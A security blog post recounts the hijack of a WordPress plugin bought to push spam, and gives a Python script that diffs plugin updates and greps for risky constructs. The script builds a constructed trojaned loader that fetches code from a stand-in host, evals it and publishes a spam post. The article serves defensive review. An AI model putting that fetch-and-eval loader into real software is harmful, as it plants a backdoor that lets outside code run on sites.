An Interesting New Twist on WordPress Site Hijacking

This story reads like fiction. OK, not great fiction, but it illustrates another way that WordPress websites can be hijacked and used to promote a cyber scam.

WordPress websites are often hijacked so a phisher can host a landing page on a site that does not lead back to them. WordPress sites are also interesting targets for other cyber-criminals, who export the user table, with its password hashes, for offline cracking and sale on the Dark Web.

In this case, the cyber scammer actually paid $15,000 to the developer of a popular WordPress plugin, “Display Widgets.” After modifying the plugin code, he published an update through the WordPress plugin directory, and sites that kept the plugin current installed it like any other routine update. The new code posted spam messages promoting a payday loan business that he also owned.
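The practical check this incident calls for is to treat every plugin update as untrusted code: snapshot the installed plugin, diff it against the updated copy, and read whatever was added or changed, looking first for loader-style constructs (remote fetch, eval, base64_decode) and for code that creates posts. The script below is an added example written for this article; it is not code from the post, from Wordfence's analysis, or from the real plugin. The plugin files, the host example.invalid and the pattern names are constructed for the demonstration.

```python
"""Baseline-and-diff review of a WordPress plugin update, plus a grep of the
changed files for risky constructs.  Example code for this article; the
plugin contents below are constructed and do not reproduce any real plugin."""
import hashlib
import re
import tempfile
from pathlib import Path

# Constructs that should never appear unexplained in a plugin update.
# The names are this example's own labels.
SUSPICIOUS_PATTERNS = {
    "eval": re.compile(r"\beval\s*\("),
    "base64_decode": re.compile(r"\bbase64_decode\s*\("),
    "remote_fetch": re.compile(
        r"\b(file_get_contents|curl_exec|wp_remote_get|wp_remote_post)"
        r"\s*\(\s*['\"]https?://"),
    "creates_post": re.compile(r"\bwp_insert_post\s*\("),
}


def sha256_file(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def snapshot(plugin_dir: Path) -> dict:
    """Map every file under the plugin (relative path) to its SHA-256."""
    return {str(p.relative_to(plugin_dir)): sha256_file(p)
            for p in sorted(plugin_dir.rglob("*")) if p.is_file()}


def diff_snapshots(before: dict, after: dict) -> dict:
    """Files the update added, changed or removed relative to the baseline."""
    common = set(before) & set(after)
    return {
        "added": sorted(set(after) - set(before)),
        "removed": sorted(set(before) - set(after)),
        "modified": sorted(f for f in common if before[f] != after[f]),
    }


def scan_files(plugin_dir: Path, rel_paths) -> list:
    """Return (relative path, line number, pattern name) for each hit."""
    findings = []
    for rel in rel_paths:
        text = (plugin_dir / rel).read_text(errors="replace")
        for lineno, line in enumerate(text.splitlines(), start=1):
            for name, pat in SUSPICIOUS_PATTERNS.items():
                if pat.search(line):
                    findings.append((rel, lineno, name))
    return findings


def review_update(before_dir: Path, after_dir: Path) -> dict:
    """What the update changed, and whether the changed code looks like a loader."""
    changes = diff_snapshots(snapshot(before_dir), snapshot(after_dir))
    to_scan = changes["added"] + changes["modified"]
    return {"changes": changes, "findings": scan_files(after_dir, to_scan)}


# Constructed plugin contents for the demonstration (not a real plugin).
CLEAN_MAIN = """<?php
/* Plugin Name: Example Widgets */
add_action('widgets_init', 'example_widgets_register');
function example_widgets_register() { register_widget('Example_Widget'); }
"""
TROJANED_MAIN = CLEAN_MAIN + "require_once __DIR__ . '/geo.php';\n"
TROJANED_LOADER = """<?php
// Pulls code from an outside server, runs it, then plants a post.
$payload = file_get_contents('https://example.invalid/update.txt');
eval($payload);
wp_insert_post(array('post_title' => 'Fast loans', 'post_status' => 'publish'));
"""


def build_demo() -> tuple:
    """Write a 'before' and an 'after' copy of the plugin into a temp dir."""
    root = Path(tempfile.mkdtemp())
    before = root / "before" / "example-widgets"
    after = root / "after" / "example-widgets"
    for d in (before, after):
        d.mkdir(parents=True)
    (before / "example-widgets.php").write_text(CLEAN_MAIN)
    (before / "readme.txt").write_text("Stable tag: 2.6\n")
    (after / "example-widgets.php").write_text(TROJANED_MAIN)
    (after / "readme.txt").write_text("Stable tag: 2.6\n")
    (after / "geo.php").write_text(TROJANED_LOADER)
    return before, after


if __name__ == "__main__":
    b, a = build_demo()
    report = review_update(b, a)
    print("changed:", report["changes"])
    for rel, lineno, name in report["findings"]:
        print(f"{rel}:{lineno}: {name}")
```

In practice the "before" snapshot is taken from the plugin as installed (or from the version you last reviewed), and the "after" copy is the update as downloaded, before it is activated. A file that an update adds and immediately requires from the main plugin file, as geo.php is here, deserves a full read even when the grep is quiet, since a loader can be written without any of the patterns above.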

The same buyer had already purchased and modified other plugins from other developers, including the “404 to 301” plugin. The full story is available on the Wordfence blog, and I encourage you to click over for a read.

The important take-away here is that even if you are doing everything possible to secure your website, it can be compromised as the result of another person’s business decision to sell their software to another company. An update from the plugin directory carries the original plugin’s name and reputation, not the new owner’s, so the only defenses on your side are to review what each update actually changes and to watch for content on your site that you did not publish.

About the Author:

Cybersecurity guru to business owners in the St Paul, Minneapolis, and western Wisconsin area. Computer security and hacking have been a passion of mine since I entered the computer and networking business in 2000. In 2013 I completed a course of study and certification exam to become a Certified Ethical Hacker (CEH). In 2016 I was certified as a Certified Information Systems Security Professional (CISSP). As Cybersecurity Analyst at The WyzCo Group, I help our clients experience high levels of computer security, network security, and web site security. In addition to consulting on security products and services, we also conduct security audits, vulnerability assessments and full penetration tests. We also provide Cybersecurity Awareness Training for clients and their employees. We also work with companies and organizations that need to certify compliance with regulations such as PCI-DSS (credit card processing), HIPAA/HITECH (medical records), and GLBA. The views expressed on this Web site are mine alone and do not necessarily represent the views of my employer.
